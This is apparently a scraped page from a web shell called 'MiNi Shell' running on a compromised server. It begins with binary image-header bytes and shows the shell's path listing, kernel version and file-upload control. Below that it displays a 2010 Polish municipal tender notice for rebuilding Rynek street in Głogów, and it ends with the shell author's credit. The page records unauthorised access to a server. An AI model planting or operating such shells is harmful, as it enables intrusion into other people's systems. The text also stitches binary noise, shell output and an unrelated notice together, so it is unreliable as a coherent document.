JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100111/6697-N-2010.html

<p class="kh_header"><b>Głogów: Budowa ulicy Rynek na Starym Mieście w Głogowie                    w ramach realizacji zadania pn.: Infrastruktura na Starym Mieście, w tym m.in.              ul. Rynek, zagospodarowanie terenu za Ratuszem, ul. Długa droga tymczasowa.</b><br>
<b>Numer ogłoszenia: 6697 - 2010; data zamieszczenia: 11.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Rynek na Starym Mieście w Głogowie                    w ramach realizacji zadania pn.: Infrastruktura na Starym Mieście, w tym m.in.              ul. Rynek, zagospodarowanie terenu za Ratuszem, ul. Długa droga tymczasowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia 
Branża drogowa
1.	Dane ogólne:
.	Długość proj. ulicy - 147,88 m
.	Szerokość proj. jezdni - 12,00 m
.	Chodnik jednostronny - szer. min. - 3,25 m
.	Odwodnienie 
.	Oświetlenie



 
Jezdnia:
a.	konstrukcja proj. - 1.887,20 m2 
-	kostka kamienna wys. 20cm (materiał Zamawiającego), wypełnienie spoin                   w 1/3 miałem bazaltowym oraz w 2/3 gotową zaprawą fugową do kostki kamiennej typu Sopro
-	podsypka cementowo- piaskowa 1:4 gr. 5 cm
-	podbudowa tłuczniowa gr. 20 cm
      b. nawierzchnia z kostki kamiennej gr. 20 cm do przełożenia - 110,50 m2 (odzysk)
      c. nawierzchnia z kostki kamiennej gr. 10 cm do przełożenia - 22,70 m2 (odzysk)
2.	Chodnik:
a.	nawierzchnia z płyt granitowych 50x50x7 na podsypce cement. - piaskowej               gr. 8 cm z wypełnieniem spoin w 1/3 miałem bazaltowym oraz w 2/3 gotową zaprawą fugowa do kostki brukowej typu Sopro - 283,80 m2 
b.	nawierzchnia chodnika z płyt granitowych gr. 7 cm na podsypce cementowo - piaskowej gr. 8 cm z uzupełnieniem spoin miałem bazaltowym (materiał                       z rozbiórki )- 23,30 m2 - przełożenie,
c.	nawierzchnia chodnika z kostki granitowej z płyt, klasa I, gatunek I gr. 10 cm na podsypce cementowo - piaskowej gr. 5 cm z wypełnieniem spoin w 1/3 miałem bazaltowym oraz w 2/3 gotową workowaną zaprawą fugową do kostki brukowej typu Sopro - 271,70 m2 - kolor czarny
3.	Krawężniki i obrzeża:
a.	krawężniki kamienne 20x35, rodzaj A na podsypce cementowo - piaskowej                    i ławie betonowej z oporem- 314,70 m
b.	krawężniki kamienne 20x35 , rodzaj A na podsypce cementowo - piaskowej gr. 5 cm i ławie betonowej z oporem (materiał z rozbiórki)- 19,70m
c.	obrzeża betonowe 30x8 na podsypce piaskowej gr. 3 cm - 13,40m
4.	Ścieki przykrawężnikowe:
a.	ściek przykrawężnikowy z kostki kamiennej regularnej, klasa I, gatunek I gr. 20 cm na podsypce cementowo -piaskowej gr. 5 cm z wypełnieniem spoin zaprawą cementową - 133,40 m2 
b.	ściek przykrawężnikowy z kostki kamiennej regularnej gr. 20 cm na podsypce cementowo - piaskowej gr. 5 cm z wypełnieniem spoin zaprawą cementową (materiał z rozbiórki) - 9,80 m2 
7.	Tymczasowa nawierzchnia z płyt żelbetowych 3,00x1,60x0,18 (materiał                  z rozbiórki) - 124,80 m2 
8.	 Oznakowanie pionowe:
-	słupki do znaków - 7 szt.
-	tarcze znaków - 19 szt.
-	przestawienie znaków 2 szt.
-	demontaż znaków - 7 szt.
8. Oznakowanie poziome -33,20 m2
- wydzielenie miejsc postojowych kostką granitową koloru czarnego
      9. Kosze na śmieci K-S8 - 8 szt.
Branża sanitarna:
1.	Odwodnienie dróg:
a)	przykanaliki (od wpustów ulicznych do kanalizacji ogólnospławnej):
-	z rur PVC O 160 mm L = 5,5 mb
-	z rur PVC O 200 mm L = 86,5 mb
b)	wpusty uliczne betonowe O 500 z osadnikiem, syfonem i koszem,                                  z kratami uchylnymi na zawiasach kl. D400 - 8szt.
2.	Regulacja wysokościowa istniejących studni na kanalizacji ogólnospławnej -                  3 szt.
3.	Regulacja wysokościowa istniejących studni na kanalizacji ogólnospławnej                    z wymianą włazów na włazy żeliwne typu ciężkiego - 14 szt.
4.	Regulacja wysokościowa istniejących skrzynek gazowych i wodociągowych -              22 szt.

Branża elektryczna :
1.	Budowa linii kablowej n/n 0,4 kV  YAKXs  4 x 35 mm                 	-    188 mb
2.	Montaż fundamentów prefabrykowanych  B ( F 100 )                    	-    6 szt.
3.	Montaż latarni D6a  2/5  i  3/5                                                         	-    6 szt.    
4.	Montaż opraw  ( 05 )  Dawid                                                        	-    6  szt.                                     
5.	Montaż  instalacji uziemiającej  - bednarka FeZn  30 x 4  mm      	 -   30 mb
6.	Montaż lamp sodowych NAV T 100W  SUPER                              	-    6 szt.
7.	Montaż rur osłonowych DVK, SRS i A 110 PS                              	 -  66 mb.

Szczegółowy zakres zamówienia określa dokumentacja projektowa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 20000,- zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie pięciu lat roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadające swym rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.
      Zamawiający za robotę podobną uzna robotę polegającą na budowie/przebudowie     drogi o nawierzchni z kostki kamiennej o powierzchni nie mniejszej jak 1.000 m2 wraz z odwodnieniem i oświetleniem.  
4)	dysponują lub będą dysponować, osobami posiadającymi uprawnienia do:
-	kierowania robotami budowlanymi w specjalności drogowej w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami  budowlanymi  w specjalności instalacyjnej w zakresie sieci  kanalizacyjnych w zakresie niezbędnym do wykonania zamówienia,
-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci,  urządzeń elektrycznych w zakresie niezbędnym do wykonania zamówienia, 
      posiadającymi aktualne zaświadczenie o przynależności do OIIB,
5)  Posiadają środki finansowe w wysokości co najmniej  400.000,00 zł lub zdolność  
      kredytową w wysokości co najmniej 400.000,00 zł .
6) Posiadają ubezpieczenie działalności od OC w zakresie prowadzonej działalności  
     gospodarczej.
Zamawiający dokona oceny spełnienia warunków na podstawie oświadczeń i dokumentów na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.   Formularza ofertowego - zał. Nr 1 do SIWZ.
2.   Kosztorysu ofertowego opracowanego metodą szczegółową   
3.	Harmonogramu rzeczowo - finansowych w układzie miesięcznym   
Na etapie zawierania umowy Zamawiający zastrzega sobie możliwość dokonania aktualizacji harmonogramu rzeczowo - finansowego.
    Uwaga !
Podane przy poszczególnych pozycjach przedmiaru numery katalogów mają jedynie charakter informacyjny.
Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru
kalkulację własną.
4.	Dowodu wniesienia wadium.
5.	Aktualnego odpisu z właściwego rejestru ,jeżeli odrębne przepisy wymagają wpisu do rejestru ,w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy,
6.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców, do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku wykonawców wspólnie ubiegających się o niniejsze zamówienie.
7.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8.	Aktualnego zaświadczenia  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.	Oświadczenia o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp - zał. Nr 2 do SIWZ,
10.	Oświadczenie o braku podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust.1- zał Nr 3 do SIWZ
11.	Oświadczenia na temat wielkości średniego rocznego zatrudnienia u wykonawcy   
               oraz  liczebności personelu kierowniczego w okresie ostatnich 3-ch lat przed 
               upływem terminu składania ofert , a w przypadku gdy okres  prowadzenia 
              działalności jest krótszy - w tym okresie - zał. Nr 4 do SIWZ.
12.	 Wykazu osób ,które będą uczestniczyć w wykonywaniu zamówienia ,w szczególności 
 odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami 
 budowlanymi ,wraz z informacjami nt ich kwalifikacji zawodowych ,doświadczenia i 
 wykształcenia niezbędnych do wykonania zamówienia ,a także zakresu 
 wykonywanych przez nie czynności ,oraz informacja o podstawie do dysponowania 
 tymi osobami - zał Nr 4 do SIWZ.
      13. Oświadczenie, że osoby ,które będą uczestniczyć w wykonywaniu zamówienia 
       posiadają wymagane uprawnienia ,jeżeli ustawy nakładają obowiązek posiadania 
        takich uprawnień,
14.	Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć   
              podwykonawcom- zał. Nr 5 do SIWZ.
15.	Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania 
      warunku wiedzy i doświadczenia ,wykonanych w okresie ostatnich pięciu lat przed 
      upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest 
      krótszy - w tym okresie .z podaniem ich rodzaju i wartości ,daty i miejsca   
      wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały  
      wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - zał. Nr 6   
     do SIWZ,
      16  .Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym  
            wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków 
      finansowych w wysokości co najmniej 400.000,00 zł. lub zdolność kredytową 
      wykonawcy na kwotę co najmniej 400.000,00 zł. wystawiona nie wcześniej niż 3  
       miesiące przed upływem terminu składania ofert,
17.Zapłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
      wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej    
      działalności związanej z przedmiotem zamówienia,

UWAGA:
1.	Jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy ,a podmioty te będą brały udział w realizacji części zamówienia należy przedłożyć w odniesieniu do tych podmiotów dokumenty wymienione w p.9.1 pp.5,7 ,8 i 10 SIWZ.
2.	Jeżeli Wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy ,a podmioty te będą brały udział w realizacji części zamówienia należy przedłożyć w odniesieniu do tych podmiotów dokumenty wymienione w p.9.1 pp.16 SIWZ.
3.	Jeżeli  Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, a w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2010 godzina 12:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.125 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com